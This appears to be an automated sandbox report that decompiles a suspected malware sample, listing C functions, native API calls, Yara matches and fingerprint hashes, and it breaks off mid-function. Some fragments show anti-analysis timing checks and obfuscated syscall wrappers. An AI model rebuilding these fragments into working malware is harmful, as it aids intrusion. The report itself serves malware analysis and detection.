                                  control_flow_graph 270 409b40-409b69 call 41af70 273 409b6b-409b6e 270->273 274 409b6f-409b7d call 41b390 270->274 277 409b8d-409b9e call 419720 274->277 278 409b7f-409b8a call 41b610 274->278 283 409ba0-409bb4 LdrLoadDll 277->283 284 409bb7-409bba 277->284 278->277 283->284
                                  C-Code - Quality: 100%
                                  			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
                                  				char* _v8;
                                  				struct _EXCEPTION_RECORD _v12;
                                  				struct _OBJDIR_INFORMATION _v16;
                                  				char _v536;
                                  				void* _t15;
                                  				struct _OBJDIR_INFORMATION _t17;
                                  				struct _OBJDIR_INFORMATION _t18;
                                  				void* _t30;
                                  				void* _t31;
                                  				void* _t32;
                                  
                                  				_v8 =  &_v536;
                                  				_t15 = E0041AF70( &_v12, 0x104, _a8);
                                  				_t31 = _t30 + 0xc;
                                  				if(_t15 != 0) {
                                  					_t17 = E0041B390(__eflags, _v8);
                                  					_t32 = _t31 + 4;
                                  					__eflags = _t17;
                                  					if(_t17 != 0) {
                                  						E0041B610( &_v12, 0);
                                  						_t32 = _t32 + 8;
                                  					}
                                  					_t18 = E00419720(_v8);
                                  					_v16 = _t18;
                                  					__eflags = _t18;
                                  					if(_t18 == 0) {
                                  						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                  						return _v16;
                                  					}
                                  					return _t18;
                                  				} else {
                                  					return _t15;
                                  				}
                                  			}














                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 285 4185e0-418631 call 4191e0 NtCreateFile
                                  C-Code - Quality: 100%
                                  			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                  				long _t21;
                                  				void* _t31;
                                  
                                  				_t3 = _a4 + 0xc40; // 0xc40
                                  				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                  				return _t21;
                                  			}






                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 288 4187bb-4187fd call 4191e0 NtAllocateVirtualMemory
                                  C-Code - Quality: 58%
                                  			E004187BB(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                  				void* _t11;
                                  				long _t15;
                                  				void* _t22;
                                  
                                  				asm("out 0x41, eax");
                                  				asm("scasd");
                                  				asm("jecxz 0x2");
                                  				_t10 = _a4;
                                  				_t3 = _t10 + 0xc60; // 0xca0
                                  				_t11 = E004191E0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                  				 *((intOrPtr*)(_t11 + 0xa)) =  *((intOrPtr*)(_t11 + 0xa)) + _t11 + 0xa;
                                  				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                  				return _t15;
                                  			}







                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 422c28881e6c98ec1bbf9cad4759446bbdc139124385258cc025dc8bb7b4ef28
                                  • Instruction ID: 13f9e054c6157e8503caa56707d1aec48ef2e78e424b64724aa4be8ecc440d68
                                  • Opcode Fuzzy Hash: 422c28881e6c98ec1bbf9cad4759446bbdc139124385258cc025dc8bb7b4ef28
                                  • Instruction Fuzzy Hash: C7F058B1200219BBDB14DF89CC80EEB77ADEF88744F108159FA0897241C630F810CBE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 292 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                  C-Code - Quality: 100%
                                  			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                  				void* _t11;
                                  				long _t15;
                                  				void* _t22;
                                  
                                  				_t3 = _a4 + 0xc60; // 0xca0
                                  				_t11 = E004191E0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                  				 *((intOrPtr*)(_t11 + 0xa)) =  *((intOrPtr*)(_t11 + 0xa)) + _t11 + 0xa;
                                  				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                  				return _t15;
                                  			}







                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00418710(intOrPtr _a4, void* _a8) {
                                  				long _t8;
                                  				void* _t11;
                                  
                                  				_t5 = _a4;
                                  				_t2 = _t5 + 0x10; // 0x300
                                  				_t3 = _t5 + 0xc50; // 0x409763
                                  				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                  				_t8 = NtClose(_a8); // executed
                                  				return _t8;
                                  			}






                                  APIs
                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7db0bebb9f77f237483b74024dceb67a5fe438b1b5aa8d6cda341208a67de765
                                  • Instruction ID: 2ca27749ab350432bae8153686f5ecf850aa48e26d6415576d392057e59ab98b
                                  • Opcode Fuzzy Hash: 7db0bebb9f77f237483b74024dceb67a5fe438b1b5aa8d6cda341208a67de765
                                  • Instruction Fuzzy Hash: 839002B121100802D14071A944047464005A7D0341F52C025A6054554EC6998DD577A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e7b3aeed0462af9fb6c70bb1db16300739201c55bae664ee4f284fa127fe60f7
                                  • Instruction ID: 77c2f0b330aee9f2a7cfb9bfc38819dc29a5d9f8d787deca56673be801087d14
                                  • Opcode Fuzzy Hash: e7b3aeed0462af9fb6c70bb1db16300739201c55bae664ee4f284fa127fe60f7
                                  • Instruction Fuzzy Hash: 519002A135100842D10061A94414B064005E7E1341F52C029E2054554DC659CC527266
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: da3a35d5305babb32e2ed145ef91b5e88092c3f86df1d2c7c40d97f21b0337a9
                                  • Instruction ID: 47e00a0e9690807bede9ab0e8ca89ab9641b173ffb3c0c58bd537bf2ff92d76f
                                  • Opcode Fuzzy Hash: da3a35d5305babb32e2ed145ef91b5e88092c3f86df1d2c7c40d97f21b0337a9
                                  • Instruction Fuzzy Hash: 3D90027121100813D11161A945047074009A7D0281F92C426A1414558DD6968952B261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3f0e9e537d6a0b30fb4ad5fc7f1f4a9e386693de63ea1dd14b490c5bdf379145
                                  • Instruction ID: c58a63445c1d3176c2f0afe1e5341c9dc551ba6d76338ed46a76ac9647605210
                                  • Opcode Fuzzy Hash: 3f0e9e537d6a0b30fb4ad5fc7f1f4a9e386693de63ea1dd14b490c5bdf379145
                                  • Instruction Fuzzy Hash: E8900261252045525545B1A944046078006B7E0281B92C026A2404950CC5669856F761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 56dee8f700e7f27ecea800f8ddf121d5dbda2204bfb967c84ebab17975f61562
                                  • Instruction ID: 687100e76f82c98f8919f60653e3e82d0191555dcf0243ed30d70576ccac8f3f
                                  • Opcode Fuzzy Hash: 56dee8f700e7f27ecea800f8ddf121d5dbda2204bfb967c84ebab17975f61562
                                  • Instruction Fuzzy Hash: C990026161100902D10171A94404716400AA7D0281F92C036A2014555ECA658992B271
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 68e3a0e20c68bfbd84397b59c3e5a30894d4ef95e8ef9c9e6d93562bc5ed065d
                                  • Instruction ID: 6416d03a4c290f336cc19036eda2177b0d5af60ddf3e59f1fba5592eadc8c211
                                  • Opcode Fuzzy Hash: 68e3a0e20c68bfbd84397b59c3e5a30894d4ef95e8ef9c9e6d93562bc5ed065d
                                  • Instruction Fuzzy Hash: 3990026161100442414071B98844A068005BBE1251B52C135A1988550DC599886577A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a237a4cde8541203193197d24b36764eea9ecb46afff31616489597eb2f7b72a
                                  • Instruction ID: 27734de0bd7bdfb8b27431b1b6bcd7df09daac3ce22d5593f1000a2a1fc3bfb1
                                  • Opcode Fuzzy Hash: a237a4cde8541203193197d24b36764eea9ecb46afff31616489597eb2f7b72a
                                  • Instruction Fuzzy Hash: 7B90027121140802D10061A9481470B4005A7D0342F52C025A2154555DC665885176B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 77163a5ea995414cc6bc0cd8b01522b18d66d469e0bba5da2c138c28816c7ba6
                                  • Instruction ID: 26caa4eeea324f932e33ccae011f9ef87687f9de51144a7a88776ae685252da4
                                  • Opcode Fuzzy Hash: 77163a5ea995414cc6bc0cd8b01522b18d66d469e0bba5da2c138c28816c7ba6
                                  • Instruction Fuzzy Hash: 0F90026122180442D20065B94C14B074005A7D0343F52C129A1144554CC95588617661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9cf577e9b9cbd3eac78d55f2bf4365fcbe70bd7616082a684a7399d02be28bd0
                                  • Instruction ID: bdc7fbde4b6357963e75f9d6784f8a5066ea3880c168f7787a07839201009d8a
                                  • Opcode Fuzzy Hash: 9cf577e9b9cbd3eac78d55f2bf4365fcbe70bd7616082a684a7399d02be28bd0
                                  • Instruction Fuzzy Hash: DA900265221004030105A5A907046074046A7D5391752C035F2005550CD66188617261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9e7d555ebb53dbac0f9c43854229a4869a07a7c0adaf009d9afb4ac9b24a5647
                                  • Instruction ID: 4d8db79054d73ac3a593a1cab030d2e8d3024d026657a72d78a0335946e1fc6d
                                  • Opcode Fuzzy Hash: 9e7d555ebb53dbac0f9c43854229a4869a07a7c0adaf009d9afb4ac9b24a5647
                                  • Instruction Fuzzy Hash: 929002A121200403410571A94414716800AA7E0241F52C035E2004590DC56588917265
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 056eebd16758f7ddb97b80f4db5e53ea9b635763c4682faa873838c8ce01c923
                                  • Instruction ID: ef45edb81946f36033ff76347353cdf43bf2f38cae4af9224b9f01b259bbb04f
                                  • Opcode Fuzzy Hash: 056eebd16758f7ddb97b80f4db5e53ea9b635763c4682faa873838c8ce01c923
                                  • Instruction Fuzzy Hash: 6B90027121100802D10065E954087464005A7E0341F52D025A6014555EC6A588917271
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9d1af0314155f56cfd5f1c5f717f3fd85eb8226513e8fc27b5280bba667d4ca0
                                  • Instruction ID: 0aa5a3c556015053934d770f375cab8ecc16d1ccb2197cbd468a2781abdc8aac
                                  • Opcode Fuzzy Hash: 9d1af0314155f56cfd5f1c5f717f3fd85eb8226513e8fc27b5280bba667d4ca0
                                  • Instruction Fuzzy Hash: 2790026131100403D14071A954187068005F7E1341F52D025E1404554CD95588567362
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1ff5a21078cb680602f02be81dd35c6f0c431760b382c7a7313bb22b88b5f1a9
                                  • Instruction ID: 7038a967e49a2051c952b9b003898e6ba8ab28da7ae5ef5b7c6691158a0076d0
                                  • Opcode Fuzzy Hash: 1ff5a21078cb680602f02be81dd35c6f0c431760b382c7a7313bb22b88b5f1a9
                                  • Instruction Fuzzy Hash: C790026922300402D18071A9540870A4005A7D1242F92D429A1005558CC95588697361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8d5328fe8dfedaa409508e8103a160636ef89d1e1ad8f79ba249734a5947ad4f
                                  • Instruction ID: 15672e590cbbd9caeeb2b0a0dc089435d70de79e79da947d93a01ef90155fc19
                                  • Opcode Fuzzy Hash: 8d5328fe8dfedaa409508e8103a160636ef89d1e1ad8f79ba249734a5947ad4f
                                  • Instruction Fuzzy Hash: 7290027132114802D11061A984047064005A7D1241F52C425A1814558DC6D588917262
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cbeed84565a446b28133307e4fded6baa3ef5e6a6989fdb1e473eb846ea186ed
                                  • Instruction ID: 89e6769807be71310b4bb9f16521aa008a0b62989ac295bdb9093680d0fbff6b
                                  • Opcode Fuzzy Hash: cbeed84565a446b28133307e4fded6baa3ef5e6a6989fdb1e473eb846ea186ed
                                  • Instruction Fuzzy Hash: A290027121100C02D18071A9440474A4005A7D1341F92C029A1015654DCA558A5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 696a4ecc4f7f7b47fec7b1b40d142f840b6aa1d5352868de45f7bfc366fc17a0
                                  • Instruction ID: 43a116e9bdd6fcbf3509b25521a34434be1e15990cad787cb406e5e1f581f6eb
                                  • Opcode Fuzzy Hash: 696a4ecc4f7f7b47fec7b1b40d142f840b6aa1d5352868de45f7bfc366fc17a0
                                  • Instruction Fuzzy Hash: 3990027121108C02D11061A9840474A4005A7D0341F56C425A5414658DC6D588917261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E004088D0(intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				char _v24;
                                  				char _v284;
                                  				char _v804;
                                  				char _v840;
                                  				void* _t24;
                                  				void* _t31;
                                  				void* _t33;
                                  				void* _t34;
                                  				void* _t39;
                                  				void* _t50;
                                  				intOrPtr _t52;
                                  				void* _t53;
                                  				void* _t54;
                                  				void* _t55;
                                  				void* _t56;
                                  
                                  				_t52 = _a4;
                                  				_t39 = 0; // executed
                                  				_t24 = E00406E20(_t52,  &_v24); // executed
                                  				_t54 = _t53 + 8;
                                  				if(_t24 != 0) {
                                  					E00407030( &_v24,  &_v840);
                                  					_t55 = _t54 + 8;
                                  					do {
                                  						E0041A0F0( &_v284, 0x104);
                                  						E0041A760( &_v284,  &_v804);
                                  						_t56 = _t55 + 0x10;
                                  						_t50 = 0x4f;
                                  						while(1) {
                                  							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
                                  							_t56 = _t56 + 0x10;
                                  							if(_t31 != 0) {
                                  								break;
                                  							}
                                  							_t50 = _t50 + 1;
                                  							if(_t50 <= 0x62) {
                                  								continue;
                                  							} else {
                                  							}
                                  							goto L8;
                                  						}
                                  						_t9 = _t52 + 0x14; // 0xffffe1a5
                                  						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                  						_t39 = 1;
                                  						L8:
                                  						_t33 = E00407060( &_v24,  &_v840);
                                  						_t55 = _t56 + 8;
                                  					} while (_t33 != 0 && _t39 == 0);
                                  					_t34 = E004070E0(_t52,  &_v24); // executed
                                  					if(_t39 == 0) {
                                  						asm("rdtsc");
                                  						asm("rdtsc");
                                  						_v8 = _t34 - 0 + _t34;
                                  						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                  					}
                                  					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                  					_t20 = _t52 + 0x31; // 0x5608758b
                                  					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                  					return 1;
                                  				} else {
                                  					return _t24;
                                  				}
                                  			}




















                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                  • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                  • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                  • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 9 4188b0-4188e1 call 4191e0 RtlAllocateHeap
                                  C-Code - Quality: 100%
                                  			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                  				void* _t10;
                                  				void* _t15;
                                  
                                  				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                  				_t6 =  &_a8; // 0x413536
                                  				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                  				return _t10;
                                  			}






                                  APIs
                                  • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65A
                                  • API String ID: 1279760036-2085483392
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 247 407280-4072ca call 41a140 call 41ad20 call 409b40 call 413e50 256 4072cc-4072de PostThreadMessageW 247->256 257 4072fe-407302 247->257 258 4072e0-4072fa call 4092a0 256->258 259 4072fd 256->259 258->259 259->257
                                  C-Code - Quality: 82%
                                  			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                  				char _v67;
                                  				char _v68;
                                  				void* _t12;
                                  				intOrPtr* _t13;
                                  				int _t14;
                                  				long _t21;
                                  				intOrPtr* _t25;
                                  				void* _t26;
                                  				void* _t30;
                                  
                                  				_t30 = __eflags;
                                  				_v68 = 0;
                                  				E0041A140( &_v67, 0, 0x3f);
                                  				E0041AD20( &_v68, 3);
                                  				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
                                  				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                  				_t25 = _t13;
                                  				if(_t25 != 0) {
                                  					_t21 = _a8;
